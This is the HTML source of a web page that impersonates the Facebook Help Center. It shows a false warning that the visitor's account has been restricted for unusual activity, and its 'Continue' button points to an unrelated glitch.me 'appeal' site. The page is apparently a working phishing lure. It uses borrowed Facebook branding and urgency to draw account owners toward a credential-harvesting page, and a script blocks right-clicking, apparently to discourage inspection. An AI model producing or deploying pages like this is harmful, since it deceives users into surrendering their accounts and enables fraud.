
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&amp;display=swap" rel="stylesheet">
    <title>Facebook Warning</title>
    <link rel="icon" type="image/png" href="https://upload.wikimedia.org/wikipedia/commons/6/6c/Facebook_Logo_2023.png">
    <link rel="stylesheet" href="style.css">
</head>

<body>
    <div id="container">
        <div id="box">
            <img src="https://cdn.glitch.global/0e876aa8-70cf-40f1-951b-94c8002e5dcc/icon.png?v=1699082922949" alt="">
            <div id="data">
                <h4>Facebook Help Center</h4> <img src="https://cdn.glitch.global/0e876aa8-70cf-40f1-951b-94c8002e5dcc/thumbnails%2Fbluetick.png?1699082922610" alt="">
              </div>
              <div class="line"></div>
            <div id="para">
                <p>𝗪𝗲 𝗱𝗲𝘁𝗲𝗰𝘁𝗲𝗱 𝗮𝗻 𝘂𝗻𝘂𝘀𝘂𝗮𝗹 𝗮𝗰𝘁𝗶𝘃𝗶𝘁𝘆 𝗮𝗻𝗱 𝗿𝗲𝘀𝘁𝗿𝗶𝗰𝘁𝗲𝗱 𝘆𝗼𝘂𝗿 𝗮𝗰𝗰𝗼𝘂𝗻𝘁 </p>
              <p>
                𝗬𝗼𝘂 𝗰𝗮𝗻 𝘀𝘂𝗯𝗺𝗶𝘁 𝗮𝗻 𝗮𝗽𝗽𝗲𝗮𝗹 𝗳𝗼𝗿 𝗿𝗲𝘃𝗶𝗲𝘄

              </p>
                <button> <a href="https://appeal--submit-case.glitch.me/">Continue</a> </button>
            </div>
        </div>
    </div>

<script type="text/javascript">
        document.addEventListener("contextmenu", function(e) {
            e.preventDefault();
        });
    </script>
</body>

</html>
